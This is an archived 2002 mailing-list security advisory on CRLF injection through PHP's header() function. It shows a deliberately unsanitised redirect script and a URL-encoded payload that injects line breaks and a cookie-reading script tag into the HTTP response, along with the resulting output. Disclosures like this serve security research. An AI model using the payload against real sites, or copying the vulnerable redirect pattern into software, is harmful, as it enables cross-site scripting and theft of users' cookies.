PHP header() CRLF Injection

From: Matthew Murphy (mattmurphy@kc.rr.com)
Date: 09/08/02 

From: "Matthew Murphy" <mattmurphy@kc.rr.com>
To: "VulnDiscuss" <vulndiscuss@vulnwatch.org>, "VulnWatch" <vulnwatch@vulnwatch.org>, "Vuln-Dev" <vuln-dev@securityfocus.com>, "SecurITeam News" <news@securiteam.com>, "BugTraq" <bugtraq@securityfocus.com>
Date: Sat, 7 Sep 2002 17:36:49 -0500

PHP's header() function is used to modify HTTP header information by
specifying a header line, such as this:

<?php header("Location: http://www.yahoo.com/"); ?>

It is commonplace to see things such as this:

--- REDIR.PHP ---
<?php header("Location: $_GET['$url']"); ?>
--- REDIR.PHP ---

http://localhost/redir.php?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%79%61%68%6F
%6F%2E%63%6F%6D%2F%0D%0A%0D%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%
6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%3C%2
1%2D%2D

Will cause a series of lines to be produced:

HTTP/1.1 302 Found
Server: Xitami
Date: Sat, 07 Sep 2002 21:50:17 GMT
Content-length: 96
Content-type: text/html
X-powered-by: PHP/4.2.3
{Location: http://www.yahoo.com/

<SCRIPT>alert(document.cookie)</SCRIPT><!--} <-- See our code in
between the brackets
Content-type: text/html

The HTML produced is "broken" -- that is, it doesn't comply to RFC
standards,
because it doesn't have a "-->" tag. I did this to supress the stupid
"Content-type"
header that PHP was dumping in the response.

By using this, attackers can perform cross-site scripting attacks or
initiate downloads, in rare cases (via HTTP headers, such as
content-dispostion, etc.)

"The reason the mainstream is thought
of as a stream is because it is
so shallow."
                     - Author Unknown

Relevant Pages

  • Re: .NET WS client connecting to Axis WS - credentials problem
    ... Axis developer said that the blank username was appearing in the http header, ... it sets the credentials when Basic authentication or Windows ...
    (microsoft.public.dotnet.framework.webservices)
  • Re: ws-addressing
    ... SOAPAction http header: This is the most common option for web services, ... Body element in the Soap Envelope. ... I have gone through some of the articles on ws-addressing, ...
    (microsoft.public.dotnet.framework.webservices.enhancements)
  • Re: Linux 2.6.17-rc2
    ... HTTP header from A, decides where to send request from it, connects ... make all further bytes from A be copied to B without using user space but no ... Could it be done with splice() or teeor some other kernel "accelerator"? ...
    (Linux-Kernel)
  • PHP header() CRLF Injection
    ... PHP's header() function is used to modify HTTP header information by ... It is commonplace to see things such as this: ... By using this, attackers can perform cross-site scripting attacks or initiate downloads, in rare cases (via HTTP headers, such as ...
    (Bugtraq)
  • [Full-Disclosure] PHP header() CRLF Injection
    ... PHP's header() function is used to modify HTTP header information by ... It is commonplace to see things such as this: ... By using this, attackers can perform cross-site scripting attacks or initiate downloads, in rare cases (via HTTP headers, such as ...
    (Full-Disclosure)